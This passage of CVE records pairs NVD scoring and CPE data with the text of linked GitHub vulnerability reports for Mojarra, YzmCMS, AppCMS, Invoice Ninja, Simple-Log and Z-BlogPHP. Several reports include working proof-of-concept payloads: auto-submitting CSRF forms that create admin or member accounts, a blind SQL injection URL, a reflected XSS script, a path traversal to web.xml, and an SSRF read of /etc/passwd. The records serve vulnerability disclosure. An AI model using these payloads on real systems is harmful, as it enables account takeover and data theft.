"cpe:2.3:a:oracle:time_and_labor:*:*:*:*:*:*:*:*", "matchCriteriaId": "19A74710-0E0F-4123-A64C-0684824D13CA", "versionEndExcluding": null, "versionEndIncluding": "12.2.11", "versionStartExcluding": null, "versionStartIncluding": "12.2.6", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/eclipse-ee4j/mojarra/issues/4571
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "eclipse-ee4j", "mojarra" ]
There are a couple places that allow manipulating resource requests to disclose arbitrary files under application context. These are tested with Mojarra 2.3.9 and works under default configuration. 1. Resource contracts [WebappResourceHelper.findPathConsideringContracts()](https://github.com/eclipse-ee4j/mojarra/blob/master/impl/src/main/java/com/sun/faces/application/resource/WebappResourceHelper.java#L315-L321). Under a branch condition, contract name is fetched from an http parameter and doesn't go through any filtering. The resource base path is later concatenated from it and can be abused to return unwanted resource like '/contracts/../WEB-INF/web.xml'. Another place that has the same vulnerable code is [ClasspathResourceHelper.findPathConsideringContracts()](https://github.com/eclipse-ee4j/mojarra/blob/master/impl/src/main/java/com/sun/faces/application/resource/ClasspathResourceHelper.java#L337). 2. Locale prefix The patch for https://github.com/javaserverfaces/mojarra/issues/4364 is incomplete. localePrefix after the [check](https://github.com/eclipse-ee4j/mojarra/blob/master/impl/src/main/java/com/sun/faces/application/resource/ResourceManager.java#L568-L570) still contains tainted data and if the application doesn't declare 'javax.faces.resource.localePrefix' in a resource bundle, the application still continues to return that tainted input.
Multiple Path Traversal security issues
https://api.github.com/repos/eclipse-ee4j/mojarra/issues/4571/comments
1
2019-05-12T13:33:12Z
2021-08-28T01:43:09Z
https://github.com/eclipse-ee4j/mojarra/issues/4571
443,105,436
4,571
2,014
CVE-2020-35970
2021-06-03T21:15:07.837
An issue was discovered in YzmCMS 5.8. There is a SSRF vulnerability in the background collection management that allows arbitrary file read.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/53" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/53" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yzmcms:yzmcms:5.8:*:*:*:*:*:*:*", "matchCriteriaId": "199ACC23-22BA-48BA-A842-66E6D1A5AA15", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/yzmcms/yzmcms/issues/53
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yzmcms", "yzmcms" ]
Log in the background management and create a new node in the collection management ![image](https://user-images.githubusercontent.com/64850343/102096574-d584d680-3e5f-11eb-9ce8-f3ae93cf0776.png) ![image](https://user-images.githubusercontent.com/64850343/102096606-de75a800-3e5f-11eb-967b-e42d715687a8.png) Add our url with the attack code ![image](https://user-images.githubusercontent.com/64850343/102096962-41ffd580-3e60-11eb-826b-02aba806b0e1.png) ![image](https://user-images.githubusercontent.com/64850343/102097004-504df180-3e60-11eb-8034-760c6e4e8578.png) Then click collect ![image](https://user-images.githubusercontent.com/64850343/102097068-68be0c00-3e60-11eb-9564-db6b328976ce.png) Because two methods are written in the source code If you have curl extensions, use curl_ Close function. If not, use file_ get_ Contents function ![image](https://user-images.githubusercontent.com/64850343/102097390-cc483980-3e60-11eb-8aff-979d182da035.png) And when processing the URL, only the first four characters of the URL are obtained by using the substr function, and whether it is HTTP is judged. If it is, it is checked ![image](https://user-images.githubusercontent.com/64850343/102097668-2b0db300-3e61-11eb-9786-8435cf153188.png) Here, you can use the features of PHP. When PHP encounters an unknown protocol, it will throw a warning and set the protocol to null. When the Protoco is null or file, the local operation will be carried out. By default, the local file operation will be performed if the protocol is not transferred or the protocol does not exist. Therefore, we can use a custom protocol, such as httpxxx, which can start from HTTP, but can't be HTTPS. We can try to read the /etc/passwd file ![image](https://user-images.githubusercontent.com/64850343/102098131-c69f2380-3e61-11eb-92d1-5ff4f67f9c05.png) Then click collect ![image](https://user-images.githubusercontent.com/64850343/102098223-e6364c00-3e61-11eb-9814-47f6eb309ff2.png) The file was read successfully
There are SSRF vulnerabilities in background collection management
https://api.github.com/repos/yzmcms/yzmcms/issues/53/comments
1
2020-12-14T15:14:20Z
2021-01-24T06:14:40Z
https://github.com/yzmcms/yzmcms/issues/53
766,583,714
53
2,015
CVE-2020-35971
2021-06-03T21:15:07.887
A storage XSS vulnerability is found in YzmCMS v5.8, which can be used by attackers to inject JS code and attack malicious XSS on the /admin/system_manage/user_config_edit.html page.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/54" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yzmcms:yzmcms:5.8:*:*:*:*:*:*:*", "matchCriteriaId": "199ACC23-22BA-48BA-A842-66E6D1A5AA15", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/yzmcms/yzmcms/issues/54
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yzmcms", "yzmcms" ]
Hi, I would like to report Cross Site Scripting vulnerability in YzmCMS V5.8 Description: In the content.class.php row 42, No filtering of the searinfo parameterA xss vulnerability was discovered in yzmcms. In YzmCMS v5.8, stored XSS exists via the /admin/system_manage/user_config_edit.html value parameter, which allows remote attackers to inject arbitrary web script or HTML. ![图片](https://user-images.githubusercontent.com/17332952/103343590-65b15580-4ac7-11eb-96d4-77223e5e0323.png) ![图片](https://user-images.githubusercontent.com/17332952/103343632-7e217000-4ac7-11eb-89bd-ebf68e220198.png) ![图片](https://user-images.githubusercontent.com/17332952/103343647-84175100-4ac7-11eb-9058-80ee213c3de2.png) ![图片](https://user-images.githubusercontent.com/17332952/103343670-8c6f8c00-4ac7-11eb-9da2-3c9076722929.png)
YzmCMS V5.8 XSS bug
https://api.github.com/repos/yzmcms/yzmcms/issues/54/comments
1
2020-12-30T09:52:17Z
2021-01-24T06:26:45Z
https://github.com/yzmcms/yzmcms/issues/54
776,368,554
54
2,016
CVE-2020-35972
2021-06-03T21:15:07.920
An issue was discovered in YzmCMS V5.8. There is a CSRF vulnerability that can add member user accounts via member/member/add.html.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/55" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yzmcms/yzmcms/issues/55" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yzmcms:yzmcms:5.8:*:*:*:*:*:*:*", "matchCriteriaId": "199ACC23-22BA-48BA-A842-66E6D1A5AA15", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/yzmcms/yzmcms/issues/55
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yzmcms", "yzmcms" ]
After the administrator logged in, open the following the page POC: Csrf.html ``` <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="referrer" content="never"> <title>csrf</title> </head><body> <form action="http://localhost/member/member/add.html" method="post"> <input type="hidden" name="username" value="test"> <input type="hidden" name="password" value="123456"> <input type="hidden" name="nickname" value="123456"> <input type="hidden" name="email" value="123456@qq.com"> <input type="hidden" name="groupid" value="1"> <input type="hidden" name="point" value="0"> <input type="hidden" name="overduedate" value=""> <input type="hidden" name="dosubmit" value="1"> </form> <script> let oForm = document.querySelector('form'); oForm.submit(); </script> </body> </html> ``` ![图片](https://user-images.githubusercontent.com/17332952/103351723-0fe8a780-4adf-11eb-8e82-4e0da96d720d.png) Refresh page after opening ![图片](https://user-images.githubusercontent.com/17332952/103351747-2131b400-4adf-11eb-9eb8-7d6ce7b9260a.png)
There is a CSRF vulnerability to add users
https://api.github.com/repos/yzmcms/yzmcms/issues/55/comments
1
2020-12-30T12:40:28Z
2021-01-24T06:17:20Z
https://github.com/yzmcms/yzmcms/issues/55
776,437,194
55
2,017
CVE-2020-36004
2021-06-03T23:15:08.487
AppCMS 2.0.101 in /admin/download_frame.php has a SQL injection vulnerability which allows attackers to obtain sensitive database information.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/source-trace/appcms/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/source-trace/appcms/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:appcms:appcms:2.0.101:*:*:*:*:*:*:*", "matchCriteriaId": "354B85ED-D1D1-4CDB-BCF8-2C410C74F537", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/source-trace/appcms/issues/2
[ "Exploit", "Third Party Advisory" ]
github.com
[ "source-trace", "appcms" ]
First, the loopholes should be reappeared, and then the reasons should be analyzed : After logging in the background ,We know that if we need to add an app, we need a key: ![1](https://user-images.githubusercontent.com/55305492/102581125-e329ad00-413a-11eb-87c4-8c4327daa808.png) ![2](https://user-images.githubusercontent.com/55305492/102581148-ed4bab80-413a-11eb-9c40-0138747c45fe.png) So before testing, I need to create a new table in the database and add data . ![3](https://user-images.githubusercontent.com/55305492/102581170-f8064080-413a-11eb-9272-5613019d6e5e.png) The table name is "app"_ cms_list" , It then contains two pieces of data, as shown in the figure. Next, we can visit this link to perform blind SQL injection in the "now":("dawn" is the original "admin", but the system needs us to change the background name) http://www.dmsj.com:8081/dawn/download_frame.php?m=list&s=1&end=10&now=1+and+1=1%23 Pay attention to the use of "+" instead of "space", and unsuccessful words will lead to 302. At the same time, remember to log in to the background. ![4](https://user-images.githubusercontent.com/55305492/102581188-ffc5e500-413a-11eb-9ea8-771838b6ee2b.png) ![5](https://user-images.githubusercontent.com/55305492/102581195-05232f80-413b-11eb-8f64-f185be370a74.png) ![6](https://user-images.githubusercontent.com/55305492/102581208-0a807a00-413b-11eb-9efc-19c9c40c73bb.png) Little surprise, we also found that its cookie did not change before and after login, but it was in the header, interesting. Next, we analyze the code : dawn\download_frame.php We can control them completely,Then go to "get_ List": Our "$now" was handed over to "$params['where']" ![7](https://user-images.githubusercontent.com/55305492/102581223-11a78800-413b-11eb-929c-f1ccba64af8a.png) core\common.class.php ![8](https://user-images.githubusercontent.com/55305492/102581231-18ce9600-413b-11eb-8493-ef5e40ed0b94.png) In any case, our $where is not filtered and goes directly into the SQL statement : ![9](https://user-images.githubusercontent.com/55305492/102581245-1d934a00-413b-11eb-95f1-c7a0a2b86a4a.png) We follow the "query": ![10](https://user-images.githubusercontent.com/55305492/102581254-2257fe00-413b-11eb-8c3a-142a372ea6ff.png) core\database.class.php ![11](https://user-images.githubusercontent.com/55305492/102581259-25eb8500-413b-11eb-86d1-9cd06bf447dd.png) nice!
SQL injection vulnerability exists in /admin/download_frame.php(Login required)
https://api.github.com/repos/source-trace/appcms/issues/2/comments
0
2020-12-18T06:13:11Z
2020-12-18T07:19:04Z
https://github.com/source-trace/appcms/issues/2
770,598,103
2
2,018
CVE-2020-36007
2021-06-03T23:15:08.597
AppCMS 2.0.101 in /admin/template/tpl_app.php has a cross site scripting attack vulnerability which allows the attacker to obtain sensitive information of other users.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/source-trace/appcms/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/source-trace/appcms/issues/7" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:appcms:appcms:2.0.101:*:*:*:*:*:*:*", "matchCriteriaId": "354B85ED-D1D1-4CDB-BCF8-2C410C74F537", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/source-trace/appcms/issues/7
[ "Exploit", "Third Party Advisory" ]
github.com
[ "source-trace", "appcms" ]
Of course, we have to log in to the background first. Let's go look at the code, it's very easy : /dawn/templates/tpl_app.php ![1](https://user-images.githubusercontent.com/55305492/102582407-7bc12c80-413d-11eb-8b70-1b0df2c33d26.png) payload: ``` /dawn/templates/tpl_info.php?cate_id=ddddhm); });</script><script>alert(1);</script> ``` Of course, there are many files with the same problem. ![2](https://user-images.githubusercontent.com/55305492/102582413-811e7700-413d-11eb-9aa5-858bb0f7f7f7.png)
I found Reflective XSS in tpl_app.php/tpl_info.php..........(Login required)
https://api.github.com/repos/source-trace/appcms/issues/7/comments
0
2020-12-18T06:30:01Z
2020-12-18T07:20:28Z
https://github.com/source-trace/appcms/issues/7
770,606,169
7
2,019
CVE-2021-33898
2021-06-06T23:15:07.517
In Invoice Ninja before 4.4.0, there is an unsafe call to unserialize() in app/Ninja/Repositories/AccountRepository.php that may allow an attacker to deserialize arbitrary PHP classes. In certain contexts, this can result in remote code execution. The attacker's input must be hosted at http://www.geoplugin.net (cleartext HTTP), and thus a successful attack requires spoofing that site or obtaining control of it.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/invoiceninja/invoiceninja/issues/5909" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/invoiceninja/invoiceninja/issues/5909" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:invoiceninja:invoice_ninja:*:*:*:*:*:*:*:*", "matchCriteriaId": "8C208851-BE2C-4DC9-BC23-A4F015A57CF8", "versionEndExcluding": "4.4.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/invoiceninja/invoiceninja/issues/5909
[ "Patch", "Third Party Advisory" ]
github.com
[ "invoiceninja", "invoiceninja" ]
**What version of Invoice Ninja are you running?** v4.3.1 and below **What environment are you running?** N/A **Have you checked log files (storage/logs/) Please provide redacted output** N/A **Have you searched existing issues?** Yes **Have you reported this to Slack/forum before posting?** No **Describe the bug** In versions v4.3.1 and below of InvoiceNinja, there is an unsafe call to unserialize() in `app/Ninja/Repositories/AccountRepository.php` which may allow an attacker to deserialize arbitrary PHP classes. In certain contexts this can result in remote code execution. The argument to unserialize is the output from a HTTP call to `http://www.geoplugin.net/php.gp` . This is without encryption. Attack vectors are then: 1. Malicious deserialized object from geoplugin.net 2. MITM attack between the invoiceninja service and geoplugin.net **Expected behavior** Use JSON instead of native PHP objects for untrusted input. **Additional context** The responsible code is now commented out since [25feebd6c2b02687d06832442ce6ce27971849c3](https://github.com/invoiceninja/invoiceninja/commit/25feebd6c2b02687d06832442ce6ce27971849c3), however there is a note about triaging GDPR implications before reintroduction of the code block, so this may be introduced in future versions.
[CVE-2021-33898] Insecure deserialization versions <= 4.3.1
https://api.github.com/repos/invoiceninja/invoiceninja/issues/5909/comments
5
2021-06-03T12:44:38Z
2021-06-07T08:04:46Z
https://github.com/invoiceninja/invoiceninja/issues/5909
910,456,729
5,909
2,020
CVE-2020-18265
2021-06-07T19:15:07.520
Cross Site Request Forgery (CSRF) in Simple-Log v1.6 allows remote attackers to gain privilege and execute arbitrary code via the component "Simple-Log/admin/admin.php?act=act_add_member".
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/github123abc123/bird/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/github123abc123/bird/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:simple-log_project:simple-log:1.6:*:*:*:*:*:*:*", "matchCriteriaId": "32FC4E9B-6B10-4117-A273-EAE89BB8B8C1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/github123abc123/bird/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "github123abc123", "bird" ]
An issue was discovered in Simple-Log v1.6. There is a CSRF vulnerability that can add Administrator Account in the ' /admin/admin.php?act=act_add_member'. Add Administrator Account Poc: Create account:test3 password:a123456 <body onload="document.getElementById('transfer').submit()"> <div> <form method="POST" id="transfer" action="http://127.0.0.1/Simple-Log/admin/admin.php?act=act_add_member"> <input type="hidden" name="user_name" value="test3" /> <input type="hidden" name="password" value="a123456" /> <input type="hidden" name="group" value="1" /> <input type="hidden" name="email" value="123@qq.com" /> <input type="hidden" name="button" value="提交" /> </form> </div> </body> </html> ![1](https://user-images.githubusercontent.com/19451920/53621817-c86b0900-3c32-11e9-9ec1-46eade55ebe2.png)
One CSRF vulnerability in Simple-Log v1.6
https://api.github.com/repos/github123abc123/bird/issues/1/comments
0
2019-02-26T02:01:49Z
2019-03-01T07:00:46Z
https://github.com/github123abc123/bird/issues/1
414,394,003
1
2,021
CVE-2020-18268
2021-06-07T19:15:07.553
Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php."
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/zblogcn/zblogphp/issues/209" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/zblogcn/zblogphp/issues/216" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/zblogcn/zblogphp/issues/209" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/zblogcn/zblogphp/issues/216" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:*", "matchCriteriaId": "3A8D5D89-5292-42F3-A3D5-0A1D29F54B6A", "versionEndExcluding": null, "versionEndIncluding": "1.5.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "601" ]
601
https://github.com/zblogcn/zblogphp/issues/209
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "zblogcn", "zblogphp" ]
您好: 我是360代码卫士的工作人员,在我们的开源代码检测项目中发现zblogphp项目中存在一个重定向漏洞。详细信息如下: 在cmd.php页面中,当action为login,且用户已登陆时,line 19中会获取get参数redirect并用作重定向的路径 ![default](https://user-images.githubusercontent.com/39950310/52996777-88996a00-3459-11e9-93da-425003528e12.png) poc:localhost/zblogphp/zb_system/cmd.php?act=login&redirect=http://www.baidu.com
重定向漏洞
https://api.github.com/repos/zblogcn/zblogphp/issues/209/comments
1
2019-02-19T07:18:24Z
2019-12-26T06:27:37Z
https://github.com/zblogcn/zblogphp/issues/209
411,779,265
209
2,022
CVE-2020-18268
2021-06-07T19:15:07.553
Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php."
